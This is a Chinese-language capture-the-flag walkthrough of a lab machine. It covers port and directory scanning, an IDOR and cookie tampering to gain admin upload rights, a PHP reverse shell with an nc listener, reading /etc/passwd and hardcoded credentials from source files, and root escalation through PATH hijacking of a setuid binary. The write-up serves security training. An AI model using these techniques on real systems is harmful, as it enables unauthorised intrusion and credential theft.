1.端口扫描

nmap -sV -sC -v -T3 {ip}
# -T是时间参数，数字越大扫描越快

开放了80端口和22端口

2.目录爆破

访问80端口

使用gobuster进行爆破
gobuster dir -u http://10.129.95.191 -w /usr/share/wordlists/dirb/common.txt 

# 得到如下信息

3.Uploads权限获取

在查看源代码的js文件的时候，看到了如下信息

尝试访问/cdn-cgi/login

发现了一个登录入口

点击Login as Guest

进入了网站后台，发现了Uploads模块，但必须要admin权限才行

这时考虑到网站可能是利用cookie来进行身份认证的

在account界面有我们当前账号的信息

下方的两个cookie值刚好和Access ID以及Name相对应

那么我们想要修改权限role可以改成admin，但还需要Access ID

又观察到url的参数里有id这一参数，尝试将id=2修改为id=1

界面返回了admin的相关信息

修改相关cookie值

成功修改了权限，现在可以进行文件上传了

4.上传Webshell

可以直接利用kali自带的一些Webshell

cat /usr/share/webshells/php/php-reverse-shell.php 
# 拷贝内容，对ip和监听的端口进行更改，保存为shell.php

nc -nlvp 4444
# 监听端口

上传shell后，观察到之前爆破出来的路径有/uploads，所以大胆猜测上传的文件就保存在/uploads目录下

成功弹出了shell

5.flag1

python3 -c "import pty; pty.spawn('/bin/bash')"
# 切换一个更方便的pty

whoami
# 是一个www-data用户，该权限太低了，得找找看其他用户是否可以登录

cat /etc/passwd
# 查看用户，结果如下

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
robert:x:1000:1000:robert:/home/robert:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
倒数第二排有一个robert用户，有home目录，应该是一个用户

# 经过一番查找
cd /var/www/html/cdn-cgi/login
cat * |grep password
# 查找和密码相关的信息，结果如下

if($_POST[“username”]=”admin” && $_POST[“password”]=”MEGACORP_4dm1n!!”)

但是看内容这个应该是后台登录的账号密码，尝试了下，没法su robert

那只能一个个翻了

cat db.php
# 返回如下

$conn = mysqli_connect(‘localhost’,’robert’,’M3g4C0rpUs3r!’,’garage’);
>?>

su robert
# 用该密码登录成功

cd /home/robert
cat user.txt
# 得到flag{f2c74ee8db7983851ab2a96a44eb7981}

6.提权

id
# 查看当前用户组
# uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)   属于bugtracker

locate bugtracker
# 查找bugtracker，发现是一个文件

ls -al /usr/bin/bugtracker
# 查看下权限 
# -rwsr-xr-- 1 root bugtracker 8792 Jan 25  2020 /usr/bin/bugtracker
# -s权限指setid权限，由于该文件是root用户的，无论谁执行，都会以root权限进行

bugtracker
# 尝试执行

当提供的ID过大时，会直接调用cat命令

利用cat命令是需要环境变量的

echo PATH
# 查看当前环境变量
# 返回/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr # /games:/usr/local/games
# 意思是调用cat命令时会依次从上述提供的路径下去寻找相关执行文件，要是遍历完还是没找# 到，就会输出command not found

which cat
# 返回cat命令是在/bin/cat目录下

cd /tmp 
echo "/bin/sh" >cat
# 在tmp目录下创建同名cat文件

export PATH=/tmp:PATH
# $PATH中加入/tmp

加入成功

这时候执行cat命令时，就会执行/tmp下的同名cat文件，同时由于是setid，将以root权限执行/bin/sh

提权成功

但是要注意，这时候是没法使用cat命令的

可以rm /tmp/cat 然后再使用cat

或者直接使用tac root.txt